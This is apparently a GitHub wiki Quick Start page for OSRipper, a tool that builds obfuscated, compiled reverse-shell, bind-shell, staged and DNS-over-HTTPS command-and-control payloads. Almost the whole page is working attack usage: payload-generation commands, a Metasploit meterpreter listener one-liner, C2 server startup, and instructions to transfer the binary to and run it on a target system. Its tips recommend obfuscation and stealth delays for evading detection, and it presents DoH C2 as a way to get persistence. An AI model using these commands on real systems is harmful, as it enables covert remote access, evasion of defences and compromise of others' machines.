-
Notifications
You must be signed in to change notification settings - Fork 54
Quick Start
Get up and running with OSRipper in minutes! This guide covers the essential steps to generate your first payload.
# Generate reverse shell payload
osripper-cli reverse -H YOUR_IP -p 4444 --obfuscate --compileReplace YOUR_IP with your actual IP address.
The compiled binary will be in the results/ directory:
# Find your payload
ls -la results/*.binTransfer this file to your target system.
OSRipper automatically starts a Metasploit listener, or you can start it manually:
msfconsole -q -x 'use multi/handler; set payload python/meterpreter/reverse_tcp_ssl; set LHOST 0.0.0.0; set LPORT 4444; exploit'Run the binary on the target system. You should receive a connection in Metasploit.
# Start C2 server (replace with your domain)
python -m osripper.c2.server example.com --port 5000- Open browser:
http://localhost:5000 - Click "Generate Payload"
- Select "DNS-over-HTTPS C2"
- Enter your domain name
- Enable obfuscation and compilation
- Click "Generate Payload"
- Download the generated payload
- Execute on target system
- View session in dashboard
- Click on session in dashboard
- Enter commands in terminal
- View responses in real-time
For a guided experience:
# Launch interactive mode
osripper
# Follow the menu prompts:
# 1. Select payload type
# 2. Configure options
# 3. Choose obfuscation/compilation
# 4. Generate payloadosripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compileWhen to use: Standard penetration testing, red team exercises
# Generate payload
osripper-cli doh -d yourdomain.com --obfuscate --compile --delay
# Start C2 server
python -m osripper.c2.server yourdomain.comWhen to use: Bypassing network restrictions, long-term persistence
# Start C2 server with HTTPS
python -m osripper.c2.server yourdomain.com --https
# Generate payload via web UI with certificate fingerprintWhen to use: Secure C2 channels, authenticated communication
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate --compileWhen to use: Enhanced stealth, multi-stage deployment
# Show help
osripper-cli --help
# Show command-specific help
osripper-cli reverse -h
# Generate bind shell
osripper-cli bind -p 4444
# Generate reverse shell
osripper-cli reverse -H IP -p PORT
# Generate DoH C2
osripper-cli doh -d DOMAIN
# Custom script encryption
osripper-cli custom --script script.py# Full-featured payload
osripper-cli reverse -H IP -p PORT \
--obfuscate \ # Enable obfuscation
--enhanced \ # Enhanced obfuscation
--compile \ # Compile to binary
--icon icon.ico \ # Custom icon
--delay \ # Stealth delay
--output mypayload # Custom output nameNow that you've generated your first payload:
- Learn More: Read the Usage Guide for detailed instructions
- Explore Payloads: Check out Payload Types for all available options
- Web UI: Learn about the Web UI Guide for C2 management
- Advanced: Review Advanced Features for advanced techniques
- Always test payloads in a controlled environment first
-
Use obfuscation for better evasion (especially
--enhanced) - Compile to binary for easier deployment
- Enable stealth delay to avoid immediate detection
- Use DoH/HTTPS C2 for better network evasion
- Check firewall rules
- Verify IP address and port
- Ensure listener is running
- Check network connectivity
- Install Nuitka:
pip3 install nuitka - Check system dependencies
- Review error messages
- Check if server is running
- Verify port is not in use
- Check firewall settings
For more help, see the Troubleshooting Guide.
Ready to dive deeper? Check out the Usage Guide for comprehensive documentation.